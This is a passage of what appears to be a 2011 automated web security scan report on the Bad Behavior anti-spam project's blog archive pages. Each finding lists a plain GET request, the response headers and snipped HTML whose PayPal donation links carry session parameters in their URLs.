</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=3oBgFUGQXuJpS_Xhgcz_0e7dbj9GtgvV2cvDg7vzEuoMfyNb5x3AUdeRQnK&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=3oBgFUGQXuJpS_Xhgcz_0e7dbj9GtgvV2cvDg7vzEuoMfyNb5x3AUdeRQnK&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...

5.18. http://bad-behavior.ioerror.us/2006/12/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2006/12/

Request

GET /2006/12/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762119+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 28614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=MI0942tVimDW3IMO15te_zn3keSvnnqdZnKjGJUn1K_7Wwi6IAyz8c8WsVq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>As always, if you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=MI0942tVimDW3IMO15te_zn3keSvnnqdZnKjGJUn1K_7Wwi6IAyz8c8WsVq&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...

5.19. http://bad-behavior.ioerror.us/2007/01/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2007/01/

Request

GET /2007/01/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762118+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 21936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=wuCX6JDUDuOIa7rG97-dHgUBF3ERMjtjfY5rWZz9c2zlkqGrui0dGy_4d64&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>In the meantime, Bad Behavior remains a user-supported project, with all code released under the GNU General Public License. If you find Bad Behavior valuable, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=wuCX6JDUDuOIa7rG97-dHgUBF3ERMjtjfY5rWZz9c2zlkqGrui0dGy_4d64&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...

5.20. http://bad-behavior.ioerror.us/2007/12/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2007/12/

Request

GET /2007/12/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762118+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 18356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
<p>Finally, if Bad Behavior has been valuable to you, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=yo8luBOaKVL-Rhxg2AWxXUd7AFvPOVLb_7_hq3YexObc1w1uDFQFh0V0lyi&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a contribution to further Bad Behavior development</a>
...[SNIP]...

5.21. http://bad-behavior.ioerror.us/2008/01/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2008/01/

Request

GET /2008/01/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762118+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 20323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=I5v32VQFXg0C4-IeIkU040BL1KYrVPKQML2047YOTKF1RZPq3Be3dyMWfPO&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If you find Bad Behavior useful, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=I5v32VQFXg0C4-IeIkU040BL1KYrVPKQML2047YOTKF1RZPq3Be3dyMWfPO&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=aZH3B_-AmjDLENHdquKnGlS1sydXO1bLdBE1-pIBko9lDuTu7h_g3WHSIlO&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If you find Bad Behavior useful, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=aZH3B_-AmjDLENHdquKnGlS1sydXO1bLdBE1-pIBko9lDuTu7h_g3WHSIlO&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...

5.22. http://bad-behavior.ioerror.us/2008/04/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2008/04/

Request

GET /2008/04/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:18 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762117+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 21662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
<img src='http://bad-behavior.ioerror.us/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> Okay, you can&#8217;t do that online, so consider dropping off <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=p10ZS6RI6mT37AfgLegCTumUJY8kY3ZQ4D2TZm8ArQ_lfy6WY2G8RTPI-tm&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">$5.00</a> or <a href="https://www.paypal.com/uk/cgi-bin/webscr?cmd=_flow&amp;SESSION=9eMnrwT6s251yFcQT-nGmNl4DS0okYKm0R4SjOCgygNi2fUEzNMXqLKOGMu&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">&pound;2.75</a> or <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=V0wWxm_G1V48jWMVq1ukYCatwNC40Ykp2JTrYShwmxEvZfpbfxaPNPtMxIe&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">&euro;3,50</a> instead. Or if you feel it&#8217;s really worth it, you can <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=w6TyEKKlIhnOzq4f-Hhb5HDEtoqU34a5Iibb0RZVjkLCJLdGEK2dhRsLynO&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">contribute more</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=MDWtH9Em2hW2UFGbWmxIy_1kbprn5mWG78wf9HKUY1TJxwd2A9XIDguR3HW&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If you find Bad Behavior useful, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=MDWtH9Em2hW2UFGbWmxIy_1kbprn5mWG78wf9HKUY1TJxwd2A9XIDguR3HW&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=kSSZj6S2wKxcq5zCl6I-TM6-_ZvCLlU83qWFABvdv0h68q2Tr_S9bE3WeNu&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If you find Bad Behavior useful, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=kSSZj6S2wKxcq5zCl6I-TM6-_ZvCLlU83qWFABvdv0h68q2Tr_S9bE3WeNu&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...

5.23. http://bad-behavior.ioerror.us/2008/05/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2008/05/

Request

GET /2008/05/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762116+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 14743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=WPuUr2Je7MepjdvvyTy5R-k_OtjQmatQkFRYel6IRQFTPferUaPt2TUhJWC&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If you find Bad Behavior useful, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=WPuUr2Je7MepjdvvyTy5R-k_OtjQmatQkFRYel6IRQFTPferUaPt2TUhJWC&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...

5.24. http://bad-behavior.ioerror.us/2008/07/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2008/07/

Request

GET /2008/07/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762116+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 33344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=O0TYuXfCXDEkp9fjembSwTsNscMGBoRzxPjb6rpAsEgB5FJ6iCXhkM3HqgC&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
rs will find honest work instead, and to do so requires a significant amount of time and resources. If you&#8217;d like to help make spam a losing proposition and help stop spammers before they start, <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=O0TYuXfCXDEkp9fjembSwTsNscMGBoRzxPjb6rpAsEgB5FJ6iCXhkM3HqgC&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=oIGvP-lmgaK2cmKSdEE3JVDL86mY7MfVHvCZw-rRZIsQKbn71pjx42zLLem&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If you find Bad Behavior useful, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=oIGvP-lmgaK2cmKSdEE3JVDL86mY7MfVHvCZw-rRZIsQKbn71pjx42zLLem&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=6hW8DRHNinJTppQriX-Is1BMLPsOg1CLmATylbT9MGeYsrJFlhcmAM3KBEi&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If you find Bad Behavior useful, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=6hW8DRHNinJTppQriX-Is1BMLPsOg1CLmATylbT9MGeYsrJFlhcmAM3KBEi&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=YWGAQR2jNWe88KWbpF3DSYi2X5KixQlNdgWJNFwCI5xVUZ8ma3TneFuPt3a&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If you find Bad Behavior useful, please consider <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=YWGAQR2jNWe88KWbpF3DSYi2X5KixQlNdgWJNFwCI5xVUZ8ma3TneFuPt3a&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">making a financial contribution</a>
...[SNIP]...

5.25. http://bad-behavior.ioerror.us/2008/08/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2008/08/

Request

GET /2008/08/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762116+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 25964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=YB4gfZgsS7C8m2b5WNS65jgscOlX4LuVbfGZJBikvkLzytueAU6XMEP1IWe&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If Bad Behavior has helped you, please <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=YB4gfZgsS7C8m2b5WNS65jgscOlX4LuVbfGZJBikvkLzytueAU6XMEP1IWe&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=v3oY71DT2TZ2WRt3yOcvFm9tyPKv_3aMBI0IAu2lJgLftOej80GZre3LWwS&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If Bad Behavior has helped you, please <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=v3oY71DT2TZ2WRt3yOcvFm9tyPKv_3aMBI0IAu2lJgLftOej80GZre3LWwS&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Ys8MAhDM6x4k3E1RZrHEHz6oy7cOnzYVT8rTLFiHPaOmAK7T_7aMq87yOMG&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If Bad Behavior has helped you, please <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=Ys8MAhDM6x4k3E1RZrHEHz6oy7cOnzYVT8rTLFiHPaOmAK7T_7aMq87yOMG&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...

5.26. http://bad-behavior.ioerror.us/2008/09/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2008/09/

Request

GET /2008/09/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762114+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 20829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=uW2JHGl_z9uSqk5sszSETp5PdeaOlrKf0-W2-nD_CqpAcI3mAypROSMYg1O&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If Bad Behavior has helped you, please <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=uW2JHGl_z9uSqk5sszSETp5PdeaOlrKf0-W2-nD_CqpAcI3mAypROSMYg1O&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...

5.27. http://bad-behavior.ioerror.us/2008/11/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2008/11/

Request

GET /2008/11/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762114+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 13933

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
</a> <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=eV1PTnQ1WNxcbahe-SyGUIq6IDYfh-ahLNCvEmZ75rz-jjHpo6oSbSLDHb0&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c"><img alt="Make a Donation. " src="https://www.paypal.com/en_US/i/btn/x-click-but21.gif" />
...[SNIP]...
<p>If Bad Behavior has helped you, please <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_flow&amp;SESSION=eV1PTnQ1WNxcbahe-SyGUIq6IDYfh-ahLNCvEmZ75rz-jjHpo6oSbSLDHb0&amp;dispatch=50a222a57771920b6a3d7b606239e4d529b525e0b7e69bf0224adecfb0124e9b61f737ba21b08198ad5733caaf944cbac24b2728ea935a7c">make a financial contribution</a>
...[SNIP]...

5.28. http://bad-behavior.ioerror.us/2009/02/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2009/02/

Request

GET /2009/02/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:15:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762112+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 14223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
